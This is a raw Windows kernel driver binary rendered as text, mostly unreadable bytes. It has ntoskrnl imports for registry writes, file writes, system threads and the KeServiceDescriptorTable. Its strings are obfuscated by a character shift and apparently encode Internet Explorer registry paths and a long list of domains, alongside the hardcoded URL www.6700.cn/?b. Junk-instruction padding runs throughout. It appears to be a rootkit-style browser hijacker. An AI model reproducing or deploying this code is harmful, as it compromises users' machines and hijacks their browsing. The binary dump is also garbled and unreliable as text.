MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       U�1�bETR��2M�q�r��̰��0P���Bh|�*��Rc�5	�*`�����vZ�$K㌱�1                        PE  L t�~H        �      9      �  �                             �P  �  ��                                �F  (                           �I  4                                                  �  �                           .text   �  �  �  �                 h.data   X2     `2                 @  �INIT    `  �F  `  �F                 �.reloc  �  �I  �  �I              @  B                <G  LG  VG  `G  rG  �G  �G  �G  �G  �G  �G  �G  �G  H  H  *H  8H  HH  ^H  zH  �H  �H  �H  �H  �H  I  I  *I  JI  ^I  jI  tI  �I  �I  �I  �I          ����� �             �D$���t���@��� ̋D$f�f��t
��f�@@��� �U��VfP�QfXR��TBZfQ��/fY�  �6���������p |�U]PT\X�p �6��������P |�|}�ZyG^]��\   %   %   U���HSVW�
   �0����@5��hDdk h   j�� �����u���   SRZ[�u�   3����V�� h� V�5� ��h\  �u��փ�U]�u�=� �E�P��3ɍE��E�   �M��E�@  �E��MȉM�fP��%fX�E�P�E�jP�E�QP�E�h?  P�� ��}�u��� 3��  fS���f[�}���   �e �
   �0����@5���E�hd  P�׿   hDdk Wj�� ���E�u3��OfS��f[�MQWP�E�jP�u��� ��|H�}�hD! �GP�� Y��Yt0�   �_����W�� j^�u��� �u��� ����   R��TBZ�u��� �e xy�hDdk h   j�� �؅���   fP��%fX�   3���h� �S�� h�  S��h� S��h|  S�֋5� �� �E�SP�֍E�hd  P��W_�E�P�E��u�jj P�u��� ��|R��TBZ�E   S�� fQ���fY�u��� fWf_�u��� �E_^[�� U��PT\X�Ef�8 t@@]� U��Qv
wt���Z�7�P ��E�%����"�X�   �_�����E�M��U]�� �U��SR��TBZ�  ST\[h$F �   U][]� �U��QVWfQ��/fYj h\F hXF hTF �'  ��E�P�q����� �� �Q�0���dF �I� �� �u��
   �W__�^���U��QU]YP�E"�X|}�ZyG]� �% w s \ % w s % w s   U���<SVWU]ht �E�P�� �   T�;�E'�GZ�8��$��E�   �e� �E�@  �E܉E��e� �e� R��TBZ�E�Ph?  �E�P�� �E�W_�}� ��  �e� �e� �e� hDdk h   j�� �EЃ}� ��  R��TBZ�e� hDdk h   j�� �E��   �   R�e� hDdk h   j�� �E�U]�}� �%  �}� �  jX����   fQ��/fY��   3��}��E�Ph   �u�j �u��u��� �E؃}� ��   R��TBZ�   3��}��h� �EЃ�PhV h4 h   �u��� ���u������fQ���fY�   3��}��ht �u��� YYh� �u��� YY�EЃ�P�u��� YYh� �u��� YYPT\X�u�u��  U]�E�@�E������u��� �   �   R��u��� �,|}�ZyG�}� t	�u��� ST\[�}� t	�u��� �u��� �u��� fRf�%fZjX_^[�� 

 U���8SVWPV^X�E�hx P�� �   �_����3ۍE��E�   �]��E�@  �EЉ]؉]�fRf�%fZSSj`jjh�   �E�SP�E�P�E�h  P�]��� fWf_;��L  9]��C  �   T�;�E'�GZ�8��$�hDdk h �  S�� ��;��}���   �
   �0����@5��� 0  3��QU]Y�E�P �   T�;�E'�GZ�8��$ËE����83����+����}��у����O���ʃ��fWf_�}�����E�O�}�$ ��	 ��|�R��TBZSSh �  �E��u�PSSS�u��� �u��� �u��5� ��|}�ZyGSSj@jjh�   �E�SP�E�P�E�h   �P�]��]��� U]9]�t�u���v
wt���Z�7�jX�3�_^[����������������U��QSVWR��TBZ�E�` �E�` �E�@�E�2ҋM�� �   �   R�E�_^[�� U��QQ�u�E�P�� �E�P�� �� U��SVW�   �   R�W_h�  ������pF |}�ZyGh�  �����lF xy�h! �����hF fP��%fX�=pF  t�=lF  t	�=hF  u2��SU][�_^[]��U���SVWSRZ[�   �   R������W�������u
�  ���   PT\Xh �E�P�� fUf�ڠf]�E�Pjj h �  �E�Pj�u�pF �E�}� }|}�ZyG�  ��   W_hF �E�P�� fUf]�E�P�E�P�lF �E�}� }�  ��bfQ���fY�E�@8� �E�@@� �E�@p� PT\X��  �tF ST\[�-���ST\[fP��%fXj hD �hF fUf�ڠf]fWf_3�_^[�� U���  SVW�   �   R�} u2��  fR�YfZj ������Pj j j �u�� ��t2��q  fP��%fXfǅ������������E��E�f�  �E�f������f�H������ fUf�ڠf]������P������P�u��������  �������������� ������ |������9�����u2���   �E�f������f�HfUf]�������  v2���   fR�YfZf������ ��   3��������f��������E��p�����������ȃ��|}�ZyGh� ������P�  ��u2��_�   T�;�E'�GZ�8��$��K   �E�fR�YfZh� �u��  ��t2��&�   ���� �$
�h �u��_  ��t2���_^[�� VPT\X�� ���   T�;�E'�GZ�8��$Å�tm���thR��TBZ�=TF rX�=XF wO�	   ��_4X7�Y�$Ã=TF u�=XF s�ư  ��Ơ  fRf�%fZ�|}�ZyG�@�@D^�3�^�U��QQSxy��� ��tR�
   �0����@5���E�h@ P�� fR�YfZ�E�jP�u�� ��uSU][�u�E�����t3��"ST\[fR�YfZ�u�u�u�u�u�u�dF [�� U��SfRf�%fZhO! �u�� Y��YujX�ST\[3�[]� U���<SVW3�SRZ[�u�=� �E�P��v
wt���Z�7��E��E�   �u��E�@  �Ẻuԉu��
   �0����@5���E�P�E�jP�� ����   R��TBZ�E�h@ P��xy��u�E�P�� �E�jP�E�P�� ��|8fRf�%fZ�E�P�E��u�jVP�u��� ��|j^fQ��/fY�E�P�� U�G  ]�u��� W_��_^[�� U��SVWfWf_�u��tb�}��t[f�? tU�   T�;�E'�GZ�8��$�W�� Y���   �_����f�> tSWV�� ����t
V�����������PT\X3�_^[]� U��� SVWfP�QfXfS���f[�E�E�}�s��   �
   �0����@5���E��u�   R��TBZ�E�P�u�� ��t�   fQ���fY�=tF  w�   fUf�ڠf]�E�tF �E�j�u��E�P�  ���e� fQ��/fY�E�P������u�@�   �   R�j h� j j j j �E�P�� ��u	�u��� v
wt���Z�7�_^[�� �U��j�h h d�    Pd�%    ��SVW�e�fQ���fY�� �E��   T�;�E'�GZ�8��$Ãe� �e� �\! �U��� 0  }:PV^X�����3����IQ�E��RS� ����u	�M���E���E���jXËe�M��SU][3��M�d�    _^[����%� �%� �%                   0 @ V t � �   F x � � � \  d  |  �  �  �  ! O! \! D! c! �! �! �! �! " +" G" k" �" �" �" �" # ## D# a# �# �# �# �# �# $ <$ ]$ {$ �$ �$ �$ �$ % 7% Z% |% �% �% �% �% & 6& T& �& �& �& �& ' #' @' _' �' �' �' �' 
( )( G( k( �( �( �( �( ) *) G) i) �) �) �) �) * )* H* g* �* �* �* �* + /+ Q+ s+ �+ �+ �+ �+ , , 7, ], }, �, �, �, - 0- V- |- �- �- �- �- . :. Y. x. �. �. �. �. / @/ _/ }/ �/ �/ �/ �/ 0 40 L0 j0 �0 �0 �0 �0 �0 1 01 O1 j1 �1 �1 �1 �1 �1 2 62 P2 n2 �2 �2 �2 �2 �2 3 03 O3 j3 �3 �3 �3 �3 �3 4 04 L4 m4 �4 �4 �4 �4 �4 5 75 T5 m5 �5 �5 �5 �5 �5 6 76 Q6 n6 �6 �6 �6 �6 �6 7 /7 J7 m7 �7 �7 �7 �7 8  8 >8 ]8 x8 �8 �8 �8 �8 	9 $9 B9 \9 z9 �9 �9 �9 �9 : 1: N: g: �: �: �: �: �: ; 5; Q; o; �; �; �; �; �; < 1< T< s< �< �< �< �< �< = 0= J= h= �= �= �= �= �= > %> <> W> n> �> �> �> �> �> ? +? H? e? �? �? �? �? @ 9@ _@ �@ �@ �@ �@ A DA jA �A �A �A B (B NB tB �B �B �B �B C 3C SC oC �C �C �C �C �C D 6D PD jD �D �D �D �D E "E 9E ME bE xE �E �E �E �E �E c! �! �! �! �! " +" G" k" �" �" �" �" # ## D# a# �# �# �# �# �# $ <$ ]$ {$ �$ �$ �$ �$ % 7% Z% |% �% �% �% �% & 6& T& �& �& �& �& ' #' @' _' �' �' �' �' 
( )( G( k( �( �( �( �( ) *) G) i) �) �) �) �) * )* H* g* �* �* �* �* + /+ Q+ s+ �+ �+ �+ �+ , , 7, ], }, �, �, �, - 0- V- |- �- �- �- �- . :. Y. x. �. �. �. �. / @/ _/ }/ �/ �/ �/ �/ 0 40 L0 j0 �0 �0 �0 �0 �0 1 01 O1 j1 �1 �1 �1 �1 �1 2 62 P2 n2 �2 �2 �2 �2 �2 3 03 O3 j3 �3 �3 �3 �3 �3 4 04 L4 m4 �4 �4 �4 �4 �4 5 75 T5 m5 �5 �5 �5 �5 �5 6 76 Q6 n6 �6 �6 �6 �6 �6 7 /7 J7 m7 �7 �7 �7 �7 8  8 >8 ]8 x8 �8 �8 �8 �8 	9 $9 B9 \9 z9 �9 �9 �9 �9 : 1: N: g: �: �: �: �: �: ; 5; Q; o; �; �; �; �; �; < 1< T< s< �< �< �< �< �< = 0= J= h= �= �= �= �= �= > %> <> W> n> �> �> �> �> �> ? +? H? e? �? �? �? �? @ 9@ _@ �@ �@ �@ �@ A DA jA �A �A �A B (B NB tB �B �B �B �B C 3C SC oC �C �C �C �C �C D 6D PD jD �D �D �D �D E "E 9E ME bE xE �E �E �E �E �E             2 W a O P Z S   A b O ` b  > O U S   J ` S U W a b ` g J c a S `   J ` S U W a b ` g J c a S ` J   J A ] T b e O ` S J ; W Q ` ] a ] T b J 7 \ b S ` \ S b  3 f ^ Z ] ` S ` J ; O W \   7 3 F > : = @ 3  3 F 3   7 < 3 B 1 > :  1 > :   J 2 S d W Q S J : ] Q O Z A g a b S [ F   J 2 ] a 2 S d W Q S a J : ] Q O Z A g a b S [ F   J A g a b S [ @ ] ] b J a g a b S [ !   J R ` W d S ` a J S b Q J V ] a b a   J   J A g a b S [ @ ] ] b   J A ] T b e O ` S J ; W Q ` ] a ] T b J E W \ R ] e a J 1 c ` ` S \ b D S ` a W ] \ J > ] Z W Q W S a J 3 f ^ Z ] ` S `   @ c \   A g a b S [ 1 V S Q Y   J a g a b S [ !   J a g a Q V Y  S f S   A g a b S [ @ ] ] b   7 ] 1 ` S O b S 2 S d W Q S   7 ] 1 ` S O b S A g [ P ] Z W Q : W \ Y   > a A S b 1 ` S O b S > ` ] Q S a a < ] b W T g @ ] c b W \ S   agaQVYSfS caS`W\WbSfS AgabS[   !&#ac`dSg&&OZZgSaQ][   !&#ORbO]PO]OZZgSaQ][   !&#Q]RS_WV]]Q][   !&#c\W]\[]^Q][   !&#XaYYc\W]\Q][   !&#dYYc\W]\Q][   !&#d Q\Q][   !&#W^Zca[aOZZgSaQ][   !&#[[ab b Q][   !&#Wd`R]PWU\Sb   !&#eeec&cQ][   !&#cc&cQ][   !&#W[UhVO\UfWcQ][   !&#bZZW\Yb]\SQ][   !&#QVO\\SZS%&Q][   !&#c%b]e\Q][   !&#c\W]\'#]ZQ][Q\   !&#[[a'#]ZQ][Q\   !&#[Ta'#]ZQ][Q\   !&#bZO&Q][   !&#ORO&Q][   !&#c QOWYcQ][   !&#[[aQOWYcQ][   !&#Q]RSQOWYcQ][   !&#^cPZSZSQ][   !&#cZSZSQ][   !&#%b]e\Q][   !&#bdaS\R%b]e\Q][   !&#Wd`aS\R%b]e\Q][   !&#bZb%b]e\Q][   !&#UaS\R%b]e\Q][   !&#a[aaS\R%b]e\Q][   !&#[[aaS\R[]gcQ][   !&#'Wd`Q][   !&#[gOR'Wd`Q][   !&#c'Wd`Q][   !&#c\W]\'Wd`Q][   !&#Q[^"^Q\gOV]]Q][   !&#c\ $#Q][   !&#c\W]\__Q][   !&#dWSeOZWc\W]\Q\gOV]]Q][   !&#c\W]\\O``]eORQ][   !&#Z\VSW[O&Q][   !&#eeeTP]ObQ\   !&#Q^`]POWRcQ][   !&#c\abObPOWRcQ][   !&#gQ\fORQ][   !&#eeeSe]e]Q][   !&#bS[^ZObSc\W]\$!Q][   !&#\SeWa$&$Q][   !&#Q`SObWdSc\W]\agaP]ZOOQ][   !&#eee_gcZSQ][   !&#''SQQ   !&#eee'Wd`Q][   !&#[UcYOYOQ][   !&#Y]]f]] OR"OZZ\Sb   !&#eee&TTTQ][   !&#c\W]\^][]V]Q][   !&#  % !!    !&#eeeS\R !Q][   !&#e%QZW\YQ][   !&#e %QZW\YQ][   !&#c\W]\Q][   !&#QZWQY&ZS&ZSQ][   !&#abPO\\S`OZZgSaQ][   !&#[[a[]gcQ][   !&#c[]gcQ][   !&#[[ac[]gcQ][   !&#aV]e[]gcQ][   !&#Wd`aS\R[]gcQ][   !&#Wd`c[]gcQ][   !&#Wd`[]gcQ][   !&#Q]`S^R[QOabQ][   !&#[&R[QOabQ][   !&#RQeeR[QOabQ][   !&#`S\`S\R[QOabQ][   !&#TWZSaVS\PO\U\Sb   !&#PO\\S`P]fQ\   !&#eeePO\\S`P]fQ\   !&#OQbW]\Q]]^S\Q\   !&#c"aYg''Q\   !&#caYg''Q\   !&#c aYg''Q\   !&#c!aYg''Q\   !&#aYg''Q\   !&#caYg''Q\   !&#cSbSQ\   !&#W^OZSfOO\geVS`SQ][   !&#eee!$#bO\Q][   !&#eeeeW\]^S\Q\   !&#eeebO\W^Q][   !&#OZSfOO\geVS`SQ][   !&#XaaPOZSfOO\geVS`SQ][   !&#\a #OZSfOO\geVS`SQ][   !&#aPOZSfOO\geVS`SQ][   !&#W^OZSfOO\geVS`SQ][   !&#^]^'dQ\   !&#fc\W[gORQ\   !&#WSPO`b b Q][   !&#S``]`\SeQSZZQ\   !&#Ocb]aSO`QV[a\Q][   !&#Q\a!% Q][   !&#aSSY!% Q][   !&#\O[SQ\\WQQ\   !&#b]]ZaPO`YcOWa]Q][   !&#eeeYcOWa]Q][   !&#YcOWa]Q][   !&#eeeQ]^ga]Q][   !&#c\W]\Q]^ga]Q][   !&#Ocb]aSO`QV[a\Q][   !&#]Y[]^VhQ][   !&#eee\QOabQ\   !&#eeeORa!% Q][   !&#!$ORa!% Q][   !&#eee[O]VSVSQ][   !&#eee##$$\Sb   !&###$$\Sb   !&#eeeUXXQQ   !&#UXXQQ   !&#eee'"'#Q][   !&#'"'#Q][   !&#[g !Q][   !&#eee[g !Q][   !&#%PQ][Q\   !&#eee%PQ][Q\   !&#eee!#$%Q][   !&#!#$%Q][   !&#eee!% Q][   !&#!% Q][   !&#Y!$'Q][   !&#eeeY!$'Q][   !&#eeeVO]c`ZQ][   !&#VO]c`ZQ][   !&#eee!% \Sb   !&#!% \Sb   !&#eee"''Q][   !&#"''Q][   !&#eee'##Q][   !&#'##Q][   !&#%'!'Q][   !&#eee%'!'Q][   !&#eee!""&Q][   !&#!""&Q][   !&#&' #Q][   !&#eee&' #Q][   !&#eeebb[^!Q][   !&#bb[^!Q][   !&#eee!bUQ\   !&#!bUQ\   !&#eeebbXXQ][   !&#bbXXQ][   !&#eee#'%&Q][   !&##'%&Q][   !&#eee'&%$#"Q][   !&#'&%$#"Q][   !&#eeehVO] !Q][   !&#hVO] !Q][   !&# !eOQ][   !&#eee !eOQ][   !&#eee#'Q][   !&#a]Tb#'Q][   !&#eeedQ][   !&#dQ][   !&#eee&##Q][   !&#&##Q][   !&#eeeec !Q][   !&#ec !Q][   !&#eeeVO]RfQ][   !&#VO]RfQ][   !&#'YcQ][   !&#eee'YcQ][   !&#eeeb b Q][   !&#b b Q][   !&#eeeYc&Q][   !&#Yc&Q][   !&#eeed !Q][   !&#d !Q][   !&#eee##Q][   !&#eee# Q][   !&## Q][   !&#eee_c !Q][   !&#_c !Q][   !&#eeeVO]YO\ !Q][   !&#VO]YO\ !Q][   !&#eeeYO\ !Q][   !&#YO\ !Q][   !&#VO\U !Q][   !&#eeeVO\U !Q][   !&#!b][Q][   !&#eee!b][Q][   !&#eeeO\ga]Q][   !&#O\ga]Q][   !&##'%&Q][   !&#eee#'%&Q][   !&#b!X"Q][   !&#eeeb!X"Q][   !&#eeehV!Q][   !&#hV!Q][   !&#eee&%#%Q][   !&#&%#%Q][   !&#eee%$$%Q][   !&#%$$%Q][   !&#WSc\W]\ !Q][   !&#eeeRO]VO\UbcQ][   !&#RO]VO\UbcQ][   !&#eeeZR !Q][   !&#ZR !Q][   !&#eee!$'Q][   !&#!$'Q][   !&#'\WQ][   !&#eee'\WQ][   !&#eee%''#Q][   !&#%''#Q][   !&#eeeaVO !Q][   !&#aVO !Q][   !&#eeeZSbV]bQ][   !&#ZSbV]bQ][   !&#eee&%#%Q][   !&#&%#%Q][   !&#"#!!Q\   !&#$VQ][Q\   !&#eee$VQ][Q\   !&#eeeXX]ZQ\   !&#XX]ZQ\   !&#eO\UhVWYcQ][   !&#eeeeO\UhVWYcQ][   !&#eeehVO\Q][   !&#hVO\Q][   !&#eee $ Q][   !&# $ Q][   !&#eee!$#Q][   !&#!$#Q][   !&#eee"#!!Q\   !&#"#!!Q\   !&#!bUQ][   !&#eee!bUQ][   !&#b][Ob]ZSWQ][   !&#eeeb][Ob]ZSWQ][   !&#'''QVOQ][   !&#eee'''QVOQ][  %[[aYQ\  %WYOYOQ][  %aOTS__Q][  %!$aOTSQ][  %PPa!$aOTSQ][  %eee[[aYQ\  %eeeWYOYOQ][  %b]]ZWYOYOQ][  %eee!$aOTSQ][  %haYW\Ua]TbQ][  %T]`c[WYOYOQ][  %c^`WaW\UQ][Q\  %aQO\YW\Ua]TbQ][  %Ydc^XWO\U[W\Q][  %`SU`WaW\UQ][Q\  %c^RObS`WaW\UQ][Q\  %c^RObS%XWO\U[W\Q][  %R]e\Z]OR`WaW\UQ][Q\  %R\ZcaYOa^S`aYgZOPaQ][  %R\Zca YOa^S`aYgZOPaQ][  %R\Zca!YOa^S`aYgZOPaQ][  %R\Zca"YOa^S`aYgZOPaQ][  %R\Zca#YOa^S`aYgZOPaQ][  %R\Zca$YOa^S`aYgZOPaQ][  %R\Zca%YOa^S`aYgZOPaQ][  %R\Zca&YOa^S`aYgZOPaQ][  %R\Zca'YOa^S`aYgZOPaQ][  %R\ZcaYOa^S`aYgZOPaQ][  %R\ZScYOa^S`aYgZOPaQ][  %R\ZSc YOa^S`aYgZOPaQ][  %R\ZSc!YOa^S`aYgZOPaQ][  %R\ZSc"YOa^S`aYgZOPaQ][  %R\ZSc#YOa^S`aYgZOPaQ][  %R\ZSc$YOa^S`aYgZOPaQ][  %R\ZSc%YOa^S`aYgZOPaQ][  %R\ZSc&YOa^S`aYgZOPaQ][  %R\ZSc'YOa^S`aYgZOPaQ][  %R\ZScYOa^S`aYgZOPaQ][   !&#eeeOP!$#Q][   !&#OP!$#Q][   !&#eee# !#\Sb   !&## !#\Sb   !&#eeeVO]Z !\Sb   !&#VO]Z !\Sb   !&#eee&'Q][   !&#&'Q][   !&#eee!% Q][   !&#!% Q][   !&#eee'#!!Q][   !&#'#!!Q][   !&#eeePOfc\Q][   !&#POfc\Q\   !&#&%"'Q][   !&#eee&%"'Q][   !&#f`ehQ][   !&#eeef`ehQ][   !&#a[O`bbO]PO]OZZgSaQ][   !&#%YSg\Sb   !&#eee%YSg\Sb  %Zc]a]TbQ][  %h\[_Q][  %O`ae^Q][  %^QbcbcQ][  %b][[a]TbQ][  %eeeZc]a]TbQ][  %eeeh\[_Q][  %eeeO`ae^Q][  %eee^QbcbcQ][  %eeeb][[a]TbQ][       �SSYS32     www.6700.cn/?b                  �                                                        �F          �I  �                      <G  LG  VG  `G  rG  �G  �G  �G  �G  �G  �G  �G  �G  H  H  *H  8H  HH  ^H  zH  �H  �H  �H  �H  �H  I  I  *I  JI  ^I  jI  tI  �I  �I  �I  �I      fZwSetValueKey ZwClose �strstr  RZwQueryValueKey G ExFreePool  ZwCreateKey dRtlInitUnicodeString  �wcscat  �wcscpy  : ExAllocatePoolWithTag �KeServiceDescriptorTable  �PsGetVersion  �_snwprintf  )ZwEnumerateKey  9ZwOpenKey nZwWriteFile ZwCreateFile  �IofCompleteRequest  AMmGetSystemRoutineAddress �ObfDereferenceObject  �ObQueryNameString �ObReferenceObjectByHandle :IoGetCurrentProcess RtlCompareUnicodeString K ExGetPreviousMode �_stricmp  PRtlFreeUnicodeString  �RtlAnsiStringToUnicodeString  aRtlInitAnsiString �_wcsnicmp �wcslen  �PsCreateSystemThread  �strncpy �PsLookupProcessByProcessId  �strncmp z_except_handler3  ntoskrnl.exe      �   3 3}3�3�3�3�344%4,4?4�4�4�4�4	55595E5N5e5�5�5�5�5�5�5�5�5�566,6�6�6�6�6�6�6�6 7V7`7�7�78.88�8�8�8�8�8�8�8�899!9I9`9{9�9�9�9�9�9/:k:�:�:�:!;*;3;j;�;�; <<)<8<B<L<V<c<l<u<�<�<�<=#=5=V=`=j=x=�=�=�=j>�>9?]?�?�?�?�?�?   L  0=0D0Y0�0�0�0�011H1]1m1�1�1�1�12�2�2�2�233,3J3O3s3�3�3�34
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4 55555555 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5 66666666 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6 77777777 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7�7 88888888 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8�8 99999999 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9�9 :::::::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�: ;;;;;;;; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�; <<<<<<<< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�< ======== =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�= >>>>>>>> >                                                                                                                                              